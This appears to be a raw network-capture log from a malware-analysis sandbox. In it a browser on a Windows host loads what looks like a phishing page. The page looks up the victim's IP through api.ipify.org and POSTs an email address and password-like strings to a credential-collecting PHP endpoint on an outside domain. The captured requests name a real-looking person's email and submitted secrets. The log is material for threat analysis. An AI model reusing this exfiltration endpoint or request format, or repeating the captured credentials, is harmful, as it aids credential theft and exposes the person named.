2025-03-24 09:13:03 UTC	1371	IN	Data Raw: be 42 20 a1 3a 36 81 2f 1f 84 15 a8 fe 5f a0 9b f5 d9 b3 67 3f f9 e4 13 ba e7 32 87 2b 9b 44 6b 7f c2 ed b7 df 7e fd f5 d7 ab df 08 a2 1e ea 9a 68 30 18 2e bd f4 d2 71 e3 c6 5d 77 dd 75 21 7c 88 d9 6c ce cb cb 5b b7 6e 5d 18 06 08 1a 12 a1 f5 cb 57 d7 d8 67 21 81 b4 b4 b4 99 33 67 3e f8 e0 83 f4 a7 28 8a 54 6d 0c 61 a4 58 06 aa ff 17 28 b8 fa d5 57 5f 9d 3c 79 92 04 5e dd 4f 5d bb 59 b5 28 8a 8d 1a 35 7a f0 c1 07 69 4a ae ee a3 0f a2 1b 8e e3 58 06 f5 35 d7 5c f3 d0 43 0f a5 a4 a4 d4 f6 43 28 ee fa d5 57 5f 51 55 47 10 83 c0 97 0f 74 00 aa ff 27 14 d2 17 45 71 e5 ca 95 ec c7 43 6d 2a 58 b1 55 ed 39 72 87 0e 1d ae bd f6 5a 0a a3 e9 38 70 50 9f b0 4b 42 10 04 7a 7c d7 5d 77 3d fc f0 c3 b5 fd 1c 59 96 39 8e db b0 61 03 25 6c 83 18 04 be 7c a0 03 50 fd 3f a1 Data Ascii: B :6/_g?2+Dk~h0.q]wu!\|l[n]Wg!3g>(TmaX(W_<y^O]Y(5ziJX5\CC(W_QUGt'EqCm*XU9rZ8pPKBz\|]w=Y9a%l\|P?
2025-03-24 09:13:03 UTC	1371	IN	Data Raw: d0 a0 81 03 07 d2 f3 f0 e5 83 d0 80 ea 1b 28 81 bf 56 de 2a fa 8d 25 24 24 b4 6d db 56 97 01 82 86 8a cf e7 a3 1b 7d 90 f7 65 3a 8c f6 71 c3 3f 3a 10 5e c8 97 bf 7f ff fe b8 b8 38 ca c2 a3 1a ba e4 cb b7 5a ad 54 e6 ab 26 e8 56 c3 56 f9 83 06 0d 1a 3e 7c 38 7b 95 f9 f2 65 59 46 f3 5c 10 3c b8 b3 18 dc 6e 37 f5 d9 a3 1b 6e c0 58 19 a5 ee 1b 0c 86 e1 c3 87 23 b0 06 b4 d9 bb 77 2f b3 60 49 92 a4 a1 e5 14 ec 95 24 89 dc 59 8d 1b 37 d6 77 a4 a1 a0 2d 5a 31 0e f5 cb df bf 7f bf c3 e1 20 c9 af b6 5f 3e 05 17 ab 9d ea c5 c5 c5 91 ea b7 6f df fe bd f7 de 53 4b 3e 03 fd f2 41 6d c1 5a df 70 e8 d0 21 8a b6 a9 db ea 68 37 e0 a1 fb 78 46 46 06 02 6b 40 9b 9c 9c 1c 75 8a b5 46 e5 47 36 83 54 14 25 35 35 55 c7 31 d6 1a 3a 05 ab d5 4a b9 e8 f9 f9 f9 a7 4f 9f 3e 7e fc b8 Data Ascii: (V*%$$mV}e:q?:^8ZT&VV>\|8{eYF\<n7nX#w/`I$Y7w-Z1 _>oSK>AmZp!h7xFFk@uFG6T%55U1:JO>~
2025-03-24 09:13:03 UTC	1371	IN	Data Raw: fa 6a ba ef 87 61 74 b5 a3 ea 52 9e 54 9f e7 79 a3 d1 58 ab 8e c0 91 70 3a 75 88 20 08 6b d7 ae 7d e6 99 67 76 ef de 5d c9 97 af fd 46 b5 2f 9f 24 5f 51 94 aa be 7c 48 3e 08 2b 31 ad fa 05 05 05 da 5b 71 d5 92 96 96 96 98 98 18 9e 11 81 06 cc f6 ed db 47 8d 1a f5 d3 4f 3f 71 1c 17 da ea f6 96 5b 6e c9 cc cc 0c c3 d0 ea 0c 2a bb 4b 45 87 aa 0d 59 57 4b 30 db ff 0d 08 f8 f2 41 83 26 a6 27 95 05 05 05 21 dc 8f d0 5d 17 54 65 d7 ae 5d 2f bf fc f2 f7 df 7f 4f 2d 98 43 88 21 b5 6e dd fa 9e 7b ee 21 d9 88 cc d5 5e a5 08 7f 90 92 1f 4d 84 a3 5f fe 5d 77 dd 45 cf c3 97 0f f4 21 76 af 2d 49 92 42 b8 35 1b 0c 86 66 cd 9a 85 61 38 a0 01 93 97 97 37 65 ca 94 65 cb 96 51 f0 b6 a4 a4 24 84 e2 f3 dd ba 75 23 47 a8 76 ad fe fa 85 75 ac a8 94 8b ae 31 4d 89 26 cf 1e 7c f9 Data Ascii: jatRTyXp:u k}gv]F/$_Q\|H>+1[qGO?q[n*KEYWK0A&'!]Te]/O-C!n{!^M_]wE!v-IB5fa87eeQ$u#Gvu1M&\|

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49751	104.26.12.205	443	5432	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 09:13:21 UTC	549	OUT	GET /?format=json HTTP/1.1 Host: api.ipify.org Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: application/json, text/javascript, /; q=0.01 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-24 09:13:21 UTC	467	IN	HTTP/1.1 200 OK Date: Mon, 24 Mar 2025 09:13:21 GMT Content-Type: application/json Content-Length: 20 Connection: close Access-Control-Allow-Origin: * Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 92550d565a15f799-EWR server-timing: cfL4;desc="?proto=TCP&rtt=104374&min_rtt=104355&rtt_var=22045&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2816&recv_bytes=1121&delivery_rate=35678&cwnd=245&unsent_bytes=0&cid=b350f3735ab12360&ts=262&x=0"
2025-03-24 09:13:21 UTC	20	IN	Data Raw: 7b 22 69 70 22 3a 22 31 36 31 2e 37 37 2e 31 33 2e 32 22 7d Data Ascii: {"ip":"161.77.13.2"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49752	172.67.74.152	443	5432	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 09:13:22 UTC	389	OUT	GET /?format=json HTTP/1.1 Host: api.ipify.org Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-24 09:13:22 UTC	434	IN	HTTP/1.1 200 OK Date: Mon, 24 Mar 2025 09:13:22 GMT Content-Type: application/json Content-Length: 20 Connection: close Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 92550d5a0e7543ad-EWR server-timing: cfL4;desc="?proto=TCP&rtt=103999&min_rtt=103024&rtt_var=22644&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2815&recv_bytes=961&delivery_rate=36060&cwnd=229&unsent_bytes=0&cid=38240750c5b5c6a2&ts=260&x=0"
2025-03-24 09:13:22 UTC	20	IN	Data Raw: 7b 22 69 70 22 3a 22 31 36 31 2e 37 37 2e 31 33 2e 32 22 7d Data Ascii: {"ip":"161.77.13.2"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49755	104.26.12.205	443	5432	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 09:13:29 UTC	549	OUT	GET /?format=json HTTP/1.1 Host: api.ipify.org Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: application/json, text/javascript, /; q=0.01 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-24 09:13:29 UTC	467	IN	HTTP/1.1 200 OK Date: Mon, 24 Mar 2025 09:13:29 GMT Content-Type: application/json Content-Length: 20 Connection: close Access-Control-Allow-Origin: * Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 92550d8958a0c3f3-EWR server-timing: cfL4;desc="?proto=TCP&rtt=102541&min_rtt=102470&rtt_var=21728&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2816&recv_bytes=1121&delivery_rate=36273&cwnd=233&unsent_bytes=0&cid=832d06ddd624e86b&ts=257&x=0"
2025-03-24 09:13:29 UTC	20	IN	Data Raw: 7b 22 69 70 22 3a 22 31 36 31 2e 37 37 2e 31 33 2e 32 22 7d Data Ascii: {"ip":"161.77.13.2"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49754	104.168.138.190	443	5432	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 09:13:29 UTC	634	OUT	POST /kuk/xwps.php HTTP/1.1 Host: avcbtech.site Connection: keep-alive Content-Length: 54 sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: application/json, text/javascript, /; q=0.01 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" Content-Type: application/x-www-form-urlencoded; charset=UTF-8 sec-ch-ua-mobile: ?0 Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-24 09:13:29 UTC	54	OUT	Data Raw: 61 69 3d 64 61 72 69 61 2e 63 7a 61 6a 6b 6f 77 73 6b 61 25 34 30 72 6f 63 6b 77 6f 6f 6c 2e 63 6f 6d 26 70 72 3d 25 33 42 66 4d 59 78 45 37 50 25 32 42 30 47 47 Data Ascii: ai=daria.czajkowska%40rockwool.com&pr=%3BfMYxE7P%2B0GG
2025-03-24 09:13:42 UTC	559	IN	HTTP/1.1 200 OK Date: Mon, 24 Mar 2025 09:13:29 GMT Server: Apache X-Powered-By: PHP/7.4.33 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, OPTIONS Access-Control-Allow-Headers: Content-Type, Authorization, X-Requested-With Set-Cookie: PHPSESSID=63b3c494f6e1298781228abcc321f51a; path=/ Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: application/json
2025-03-24 09:13:42 UTC	75	IN	Data Raw: 34 30 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 6c 61 73 74 4b 6e 6f 77 6e 32 46 41 53 74 61 74 75 73 20 69 73 20 6e 6f 74 20 64 65 66 69 6e 65 64 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 40{"status":"error","message":"lastKnown2FAStatus is not defined"}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49756	172.67.74.152	443	5432	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 09:13:30 UTC	389	OUT	GET /?format=json HTTP/1.1 Host: api.ipify.org Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-24 09:13:30 UTC	434	IN	HTTP/1.1 200 OK Date: Mon, 24 Mar 2025 09:13:30 GMT Content-Type: application/json Content-Length: 20 Connection: close Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 92550d8c6bf54289-EWR server-timing: cfL4;desc="?proto=TCP&rtt=102846&min_rtt=102750&rtt_var=21825&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2814&recv_bytes=961&delivery_rate=36142&cwnd=241&unsent_bytes=0&cid=d672148a202c4656&ts=260&x=0"
2025-03-24 09:13:30 UTC	20	IN	Data Raw: 7b 22 69 70 22 3a 22 31 36 31 2e 37 37 2e 31 33 2e 32 22 7d Data Ascii: {"ip":"161.77.13.2"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49758	104.168.138.190	443	5432	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 09:13:42 UTC	389	OUT	GET /kuk/xwps.php HTTP/1.1 Host: avcbtech.site Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-24 09:13:43 UTC	559	IN	HTTP/1.1 200 OK Date: Mon, 24 Mar 2025 09:13:43 GMT Server: Apache X-Powered-By: PHP/7.4.33 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, OPTIONS Access-Control-Allow-Headers: Content-Type, Authorization, X-Requested-With Set-Cookie: PHPSESSID=6ea51597d57187987fff4dc0e381fc69; path=/ Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: application/json
2025-03-24 09:13:43 UTC	74	IN	Data Raw: 33 66 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 45 6d 61 69 6c 20 61 6e 64 20 70 61 73 73 77 6f 72 64 20 61 72 65 20 72 65 71 75 69 72 65 64 2e 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 3f{"status":"error","message":"Email and password are required."}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49762	104.168.138.190	443	5432	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 09:13:53 UTC	634	OUT	POST /kuk/xwps.php HTTP/1.1 Host: avcbtech.site Connection: keep-alive Content-Length: 51 sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: application/json, text/javascript, /; q=0.01 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" Content-Type: application/x-www-form-urlencoded; charset=UTF-8 sec-ch-ua-mobile: ?0 Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-24 09:13:53 UTC	51	OUT	Data Raw: 61 69 3d 64 61 72 69 61 2e 63 7a 61 6a 6b 6f 77 73 6b 61 25 34 30 72 6f 63 6b 77 6f 6f 6c 2e 63 6f 6d 26 70 72 3d 6e 4c 57 73 30 6e 52 33 57 63 73 36 42 Data Ascii: ai=daria.czajkowska%40rockwool.com&pr=nLWs0nR3Wcs6B
2025-03-24 09:14:05 UTC	559	IN	HTTP/1.1 200 OK Date: Mon, 24 Mar 2025 09:13:53 GMT Server: Apache X-Powered-By: PHP/7.4.33 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, OPTIONS Access-Control-Allow-Headers: Content-Type, Authorization, X-Requested-With Set-Cookie: PHPSESSID=9f492ac899b5380b318c507f92801d70; path=/ Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: application/json
2025-03-24 09:14:05 UTC	75	IN	Data Raw: 34 30 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 6c 61 73 74 4b 6e 6f 77 6e 32 46 41 53 74 61 74 75 73 20 69 73 20 6e 6f 74 20 64 65 66 69 6e 65 64 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 40{"status":"error","message":"lastKnown2FAStatus is not defined"}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49764	104.26.12.205	443	5432	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 09:13:53 UTC	549	OUT	GET /?format=json HTTP/1.1 Host: api.ipify.org Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: application/json, text/javascript, /; q=0.01 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-24 09:13:53 UTC	467	IN	HTTP/1.1 200 OK Date: Mon, 24 Mar 2025 09:13:53 GMT Content-Type: application/json Content-Length: 20 Connection: close Access-Control-Allow-Origin: * Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 92550e1eb9316a56-EWR server-timing: cfL4;desc="?proto=TCP&rtt=107863&min_rtt=100999&rtt_var=28501&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2816&recv_bytes=1121&delivery_rate=36851&cwnd=206&unsent_bytes=0&cid=1a7b9c45146eaac3&ts=264&x=0"
2025-03-24 09:13:53 UTC	20	IN	Data Raw: 7b 22 69 70 22 3a 22 31 36 31 2e 37 37 2e 31 33 2e 32 22 7d Data Ascii: {"ip":"161.77.13.2"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49766	172.67.74.152	443	5432	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 09:13:53 UTC	389	OUT	GET /?format=json HTTP/1.1 Host: api.ipify.org Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-24 09:13:54 UTC	434	IN	HTTP/1.1 200 OK Date: Mon, 24 Mar 2025 09:13:54 GMT Content-Type: application/json Content-Length: 20 Connection: close Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 92550e21bcd08cc5-EWR server-timing: cfL4;desc="?proto=TCP&rtt=104848&min_rtt=103890&rtt_var=22856&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2817&recv_bytes=961&delivery_rate=35827&cwnd=187&unsent_bytes=0&cid=196f6e19dee3ea45&ts=259&x=0"
2025-03-24 09:13:54 UTC	20	IN	Data Raw: 7b 22 69 70 22 3a 22 31 36 31 2e 37 37 2e 31 33 2e 32 22 7d Data Ascii: {"ip":"161.77.13.2"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49771	104.168.138.190	443	5432	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 09:14:05 UTC	441	OUT	GET /kuk/xwps.php HTTP/1.1 Host: avcbtech.site Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=6ea51597d57187987fff4dc0e381fc69
2025-03-24 09:14:06 UTC	495	IN	HTTP/1.1 200 OK Date: Mon, 24 Mar 2025 09:14:06 GMT Server: Apache X-Powered-By: PHP/7.4.33 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, OPTIONS Access-Control-Allow-Headers: Content-Type, Authorization, X-Requested-With Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: application/json
2025-03-24 09:14:06 UTC	74	IN	Data Raw: 33 66 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 45 6d 61 69 6c 20 61 6e 64 20 70 61 73 73 77 6f 72 64 20 61 72 65 20 72 65 71 75 69 72 65 64 2e 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 3f{"status":"error","message":"Email and password are required."}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49776	104.168.138.190	443	5432	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 09:14:16 UTC	634	OUT	POST /kuk/xwps.php HTTP/1.1 Host: avcbtech.site Connection: keep-alive Content-Length: 38 sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: application/json, text/javascript, /; q=0.01 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" Content-Type: application/x-www-form-urlencoded; charset=UTF-8 sec-ch-ua-mobile: ?0 Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-24 09:14:16 UTC	38	OUT	Data Raw: 61 69 3d 64 61 72 69 61 2e 63 7a 61 6a 6b 6f 77 73 6b 61 25 34 30 72 6f 63 6b 77 6f 6f 6c 2e 63 6f 6d 26 70 72 3d Data Ascii: ai=daria.czajkowska%40rockwool.com&pr=
2025-03-24 09:14:16 UTC	559	IN	HTTP/1.1 200 OK Date: Mon, 24 Mar 2025 09:14:16 GMT Server: Apache X-Powered-By: PHP/7.4.33 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, OPTIONS Access-Control-Allow-Headers: Content-Type, Authorization, X-Requested-With Set-Cookie: PHPSESSID=6cf8663b2d786183caf5050955e8d603; path=/ Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: application/json
2025-03-24 09:14:16 UTC	74	IN	Data Raw: 33 66 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 45 6d 61 69 6c 20 61 6e 64 20 70 61 73 73 77 6f 72 64 20 61 72 65 20 72 65 71 75 69 72 65 64 2e 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 3f{"status":"error","message":"Email and password are required."}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49778	104.26.12.205	443	5432	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 09:14:16 UTC	549	OUT	GET /?format=json HTTP/1.1 Host: api.ipify.org Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: application/json, text/javascript, /; q=0.01 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-24 09:14:16 UTC	467	IN	HTTP/1.1 200 OK Date: Mon, 24 Mar 2025 09:14:16 GMT Content-Type: application/json Content-Length: 20 Connection: close Access-Control-Allow-Origin: * Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 92550eae1d884295-EWR server-timing: cfL4;desc="?proto=TCP&rtt=104131&min_rtt=103832&rtt_var=22056&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2816&recv_bytes=1121&delivery_rate=35793&cwnd=245&unsent_bytes=0&cid=e619ea35683ab235&ts=278&x=0"
2025-03-24 09:14:16 UTC	20	IN	Data Raw: 7b 22 69 70 22 3a 22 31 36 31 2e 37 37 2e 31 33 2e 32 22 7d Data Ascii: {"ip":"161.77.13.2"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49780	172.67.74.152	443	5432	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 09:14:17 UTC	389	OUT	GET /?format=json HTTP/1.1 Host: api.ipify.org Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-24 09:14:17 UTC	434	IN	HTTP/1.1 200 OK Date: Mon, 24 Mar 2025 09:14:17 GMT Content-Type: application/json Content-Length: 20 Connection: close Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 92550eb1aa577864-EWR server-timing: cfL4;desc="?proto=TCP&rtt=105387&min_rtt=104824&rtt_var=22692&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2817&recv_bytes=961&delivery_rate=35534&cwnd=238&unsent_bytes=0&cid=f92ed85f5d712f8d&ts=262&x=0"
2025-03-24 09:14:17 UTC	20	IN	Data Raw: 7b 22 69 70 22 3a 22 31 36 31 2e 37 37 2e 31 33 2e 32 22 7d Data Ascii: {"ip":"161.77.13.2"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49779	104.168.138.190	443	5432	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 09:14:17 UTC	441	OUT	GET /kuk/xwps.php HTTP/1.1 Host: avcbtech.site Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=6ea51597d57187987fff4dc0e381fc69
2025-03-24 09:14:17 UTC	495	IN	HTTP/1.1 200 OK Date: Mon, 24 Mar 2025 09:14:17 GMT Server: Apache X-Powered-By: PHP/7.4.33 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, OPTIONS Access-Control-Allow-Headers: Content-Type, Authorization, X-Requested-With Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: application/json
2025-03-24 09:14:17 UTC	74	IN	Data Raw: 33 66 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 45 6d 61 69 6c 20 61 6e 64 20 70 61 73 73 77 6f 72 64 20 61 72 65 20 72 65 71 75 69 72 65 64 2e 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 3f{"status":"error","message":"Email and password are required."}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49784	104.168.138.190	443	5432	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
